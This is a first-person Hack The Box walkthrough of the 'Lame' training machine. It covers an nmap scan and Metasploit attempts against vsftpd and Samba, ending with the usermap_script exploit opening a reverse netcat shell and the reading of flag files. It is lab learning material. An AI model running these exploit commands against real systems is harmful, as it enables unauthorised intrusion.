Hack The Box: Lame Walkthrough

  • by

My 2021 New Year resolution was to take a shot at learning some penetration testing techniques.

In cybersecurity OSINT plays a big part – especially in pentesting.

But at the same time it is also significantly different to the OSINT that focuses on persons, companies, emails, websites and the general digital footprint.

In pentesting, OSINT can mean anything from passive reconnaissance of the target infrastructure, searching for CVEs, literature research (in absolutely any meaning of the word), to lurking on discussion forums or even reaching out to experts for advice.

That is why I recently signed up to Hack the Box – to do all that; and through it, to learn a ton of new stuff.

So here is my first training machine I managed to hack into.

The name very aptly describes my current pentesting skills – but from here I can only get better.

LAME Walkthrough

Screenshot 2020-12-30 at 10 32 03

This walkthrough was conducted using a Linux Parrot virtual machine.

Nmap scan

I began with an nmap scan of the machine’s IP address (which is not static, it changes with every instance):

sudo nmap -T4 -A -v -p- 10.129.71.202

  -T4 - the scan speed template, ranging from 0 (slow & stealthy) to 5 (fast & obvious)

  -A - operating system and version check

  -v - verbose output
  
  -p- - scan all 65535 ports on the IP address

Scan result summary

The following 5 ports and services were identified:

    21/tcp   open  ftp          vsftpd 2.3.4
    
    22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    
    139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    
    445/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
    
    3632/tcp open  distccd      distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

nmap scan report

vsftpd 2.3.4

https://en.wikipedia.org/wiki/Vsftpd

vsftpd is a default FTP (File Transfer Protocol) server for a number of Linux distributions and it’s used for storing and sharing files.

Very clearly this is an obsolete version of the service that is highly unlikely to be detected anymore in real life.

In 2011 there were reports of an exploit detected on an archived version of vsftpd 2.3.4 that enabled a malicious backdoor execution.

Online sources: Scary Beast SecurityExploit DB.

It is worth noting that (as per the screenshot above) it is possible to connect anonymously to the FTP service.

I started with launching Metasploit Framework in order to find out more about the exploit instead of relying on online sources:

    msfconsole
    
    msf6 > search vsftpd

vsftpd

To make use of this exploit, select it from the list (here we only have 1 option marked with a zero):

    use 0

I got the message about no payload configured, but then the command defaults to cmd/unix/interact.

You can display available options by adding the “> show options”

    exploit(unix/ftp/vsftpd_234_backdoor) > show options

I set the host to the machine’s IP address:

    set RHOST 10.129.71.202

Unfortunately, these efforts were met with a message: “Exploit completed, but no session was created”.

I went back to the command line, in order to see if connecting directly to the IP address would work…

    msf6 > exit

    ftp 10.129.71.202

When prompted here I tried a number of generic user names (user, admin, test, 123, etc.).

I took me a while until I tried “anonymous” (yes, the hint is in the initial scan result).

When prompted for password, I just hit ENTER.

ftp

Admittedly, I had no idea what to do next. I found a list of Linux FTP commands from here and tried them all one after the other.

Nothing worked.

NOTE: At this point I took a long break and forgot to extend the uptime on the Lame machine.

This resulted in reseting the IP address, so I relaunched the machine on a new IP – 10.129.89.92.

OpenSSH 4.7p1

https://en.wikipedia.org/wiki/OpenSSH

OpenSSH (Secure Shell) is an encrypted, remote access service.

Version 4.7p1 has some known vulnerabilities listed here.

Searching Metasploit again revealed some exploits for Windows OS, clearly of no use here.

Samba smbd 3.X – 4.X

https://en.wikipedia.org/wiki/Samba_(software)

Samba is a service that provides file and printer sharing options across various operating systems.

Metasploit lists 19 different vulnerabilities for the Samba 3 version. Not all of these apply as some relate to Windows and Unix systems.

I could have tried the relevant exploits one by one, but the better idea is to start with those ranked the highest (excellent).

6 exploit/linux/samba/is_known_pipename  2017-03-24  excellent  Samba is_known_pipename() Arbitrary Module Load

The above exploit however seems to require valid credentials, which I did not have. So I tried another:

9 exploit/linux/samba/trans2open  2003-04-07  great  Samba trans2open Overflow (Linux x86)

msf6 exploit > use 9
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/samba/trans2open) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(linux/samba/trans2open) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] 10.129.89.92:139 - Trying return address 0xbffffdfc...
[-] 10.129.89.92:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[*]Exploit completed, but no session was created.

I unsuccessfully tried a number of times, including the next exploit on the list:

11  exploit/multi/samba/usermap_script  2007-05-14   excellent   Samba "username map script" Command Execution

msf6 > use 11
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.89.92
RHOSTS => 10.129.89.92
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Exploit completed, but no session was created.

It took me a while to understand what I was doing wrong here.

msf6 exploit(multi/samba/usermap_script) > options

The key was to understand that both the RHOSTS and LHOST IP addresses must be set correctly:

Screenshot 2021-01-31 at 20 27 19

In my case this was not configured by default.

Luckily, the ifconfig command lets you check the tun0 address.

Then simply set LHOST to that IP:

msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.101

Once everything is set, time to put the exploit to a test:

msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.101:4444 
[*] Command shell session 1 opened (10.10.14.101:4444 -> 10.129.89.92:56128) at 2021-01-31 15:20:45 -0500

Listing directories with the dir command showed the presence of home and root directories.

I navigated wit the cd, ls / dir commands between home and root, then searched for text files and used the cat command to grab hash values:

Screenshot 2021-01-31 at 20 42 07

Don’t forget to return both user and root flags and claim ownership of Lame!

Leave a Reply

Your email address will not be published.